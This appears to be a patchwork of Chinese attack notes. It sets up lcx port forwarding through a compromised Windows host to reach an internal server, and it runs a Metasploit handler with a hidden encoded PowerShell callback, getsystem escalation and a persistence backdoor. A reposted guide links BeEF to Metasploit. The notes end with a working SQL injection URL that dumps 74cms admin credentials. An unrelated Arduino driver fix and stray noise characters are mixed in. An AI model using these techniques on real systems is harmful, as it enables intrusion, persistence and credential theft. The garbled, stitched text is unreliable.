c:/Users/lcx.exe -slave kali.ip 8900 bb.bb.bbb.bb 80
lcx -m 2 -p1 8900 -p2 8000
<br />

内网结构: aaa.aa.aa.aa是肉鸡(windows) bbb.bb.bbb.bb是和肉鸡同一网段的目标服务器

  我的机器 —- 攻击用公网服务器(kali) —- a肉鸡—–b目标服务器

将lcx.exe传上肉鸡去,执行第一条命令,此时肉鸡的动作:

我的机器 —- 攻击用公网服务器(kali) (:8900)<—- a肉鸡<–(:80)–>b目标服务器

a肉鸡连接kali的8900端口,并把b目标服务器的80端口打开给kali

然后在kali上执行第二条命令,此时的动作:

我的机器 <—- (:8000)–>攻击用公网服务器(kali) <—(:8900)–> a肉鸡<–(:80)–>b目标服务器

于是在我的机器上访问http://kali.ip:8000 即打开b目标服务器的80端口,即网页

回家再把两个版本的lcx发上来

use exploit/multi/handler
set PAYLOAD (OS)/meterpreter/...

SET生成powershell:

setools

》social。。。
》1

设置HOST为metasploit服务器地址
PORT为不冲突的端口

肉鸡运行脚本:

powershell -noprofile -windowstyle hidden -noninteractive -EncodedCommand  加上SET生成的代码

提权

getsystem

持久后门:

run persistence -X -i 5 -p 2777 -r metasploit服务器地址

 摘抄

     先上一张beEF的界面图:” P  I3 P( V” \2 p( N

1.png 
现在我们开始把beEF和metasploit给关联起来,首先我们需要了解下beEF和metasploit的几个目录。
beEF的目录是在:/usr/share/beef-xss下
metasploit的两个目录分别是:/opt/metasploit 和/usr/share/metasploit-framework $ s4 g” ?: `2 U5 b! _
下面我们先进入beEF的目录下面,如下图:0 F5 ~  d( u5 d’ s5 o; @+ z  E
2.png 
我们打开config.yaml这个文件,我们需要把里面关于metasploit的那一项开启如下图:9 G$ y: t. T9 q* S7 @5 U
3.png 
将metasploit的enable的项改成true就可以了,然后保存退出。下一步我们需要进入beEF下面的extensions/metasploit目录。如下图:+ G# P/ m/ d& B( E# Y
4.png ; F- I. K/ n4 S% h: T1 B( X5 |
打开这个config.yaml文件,并把这几个地方修改下:
5.png 
这个地方ip改为你本机ip,不要用127.0.0.1。下面的路径为metasploit的路径,然后保存。‘ h; @6 Y3 T! j, G% ~% L# b
然后把metasploit的服务开启,在命令行下用msfconsole把控制台打开,接着加载beEF。所用命令为:“load msgrpc ServerHost=192.169.60.19 Pass=abc123”” Z/ T* F7 y( b8 w” F” ?’ A$ K
6.png   X* {* e) Z& k4 _* T% l
已经成功加载,接下来启动beEF看看:4 X1 V+ d1 A8 z! \. C
7.png 
可以看到已经开始加载metasploit的攻击脚本了。
进入beEF看下(如果开启beEF不成功,重启下kali就可以了):2 |5 b, Q! g2 M2 J
8.png 
Metasploit攻击模块成功加载。
PS:纯手工排版,凑和着看吧。。。

如文中未特别声明转载请注明出自:http://www.metasploit.cn/


/usr/share/beef-xss/beef
[13:24:43][!] Unable to load extension 'xssrays'
[13:24:43][!] Unable to load extension 'admin_ui'
[13:24:43][!] Unable to load extension 'network'
[13:24:43][!] Unable to load extension 'events'
[13:24:43][!] Unable to load extension 'autoloader'
[13:24:43][!] Unable to load extension 'requester'
[13:24:43][!] Unable to load extension 'dns'
[13:24:43][!] Unable to load extension 'demos'
[13:24:43][!] Unable to load extension 'ipec'
[13:24:43][!] Unable to load extension 'social_engineering'
[13:24:43][!] Unable to load extension 'proxy'
[13:24:43][!] Unable to load extension 'console'
cd /usr/share/beef 
./beef -x

If you configure a password,try to restart msfconsole

API Fire Error: invalid byte sequence in US-ASCII in {:owner=>BeEF::Extension::AdminUI::API::Handler, :id=>17}.mount_handler()
export LANG="en_US.UTF-8"

系统找不到指定文件


如果你使用的是精简版windows系统,安装Arduino驱动时,可能会遇到”系统找不到指定文件”这个问题,如下图:
 


这是因为精简版的window系统删掉了一些不常用的驱动信息引起的,解决方法如下:

1.首先打开C:\windows\inf\setupapi.dev.log 
这个文件包含了有关即插即用设备和驱动程序安装的信息,当然它也记录你Arduino驱动安装失败的原因。
打开该文件,滚动到文件末尾附近,你可以看到如下信息:
 
正是这个文件缺失,致使你的Arduino驱动无法安装。

2.在 C:\Windows\System32\DriverStore\FileRepository\ 路径下,新建一个mdmcpq.inf_x86_neutral_********文件夹
每台电脑后面的标示不一样,*******具体是什么请参照上面setupapi.dev.log文件给出的提示信息。
例如,我这台电脑给出的信息为
C:\Windows\System32\DriverStore\FileRepository\mdmcpq.inf_x86_neutral_9f203c20b6f0dabd
根据该提示,我在C:\Windows\System32\DriverStore\FileRepository\ 路径下,建立了一个同名文件夹,如下
 

下载usber.sys放进去

http://pan.baidu.com/s/1i4FEkAT

关键词:

<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /><title>会员登录</title>
<meta name=”description” content=””>
<meta name=”keywords” content=””>
<meta http-equiv=”X-UA-Compatible” content=”IE=7″>
<link rel=”shortcut icon” href=”/favicon.ico” />
<meta name=”author” content=”骑士CMS” />
<meta name=”copyright” content=”74cms.com” />
<link href=”/templates/default1_blue/css/user.css” rel=”stylesheet” type=”text/css” />
<script src=”/templates/default1_blue/js/jquery.js” type=’text/javascript’ language=”javascript”></script>
<script type=”text/javascript”>
$(document).ready(function()
{
//
$(“#username”).focus(function(){
if ($(“#username”).val()==”用户名/邮箱/手机号”)
{
$(“#username”).val(”);
$(“#username”).css(“color”,””);
}  
});
//
$(“.but80”).hover(function(){$(this).addClass(“but80_hover”)},function(){$(this).removeClass(“but80_hover”)});
//验证

exp:

http://demo.74cms.com/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27union+/*!50000SeLect*/+1,group_concat%28admin_name,0x3a,pwd,0x3a,pwd_hash%29,3+from+qs_admin%23

爆出来的密文破不了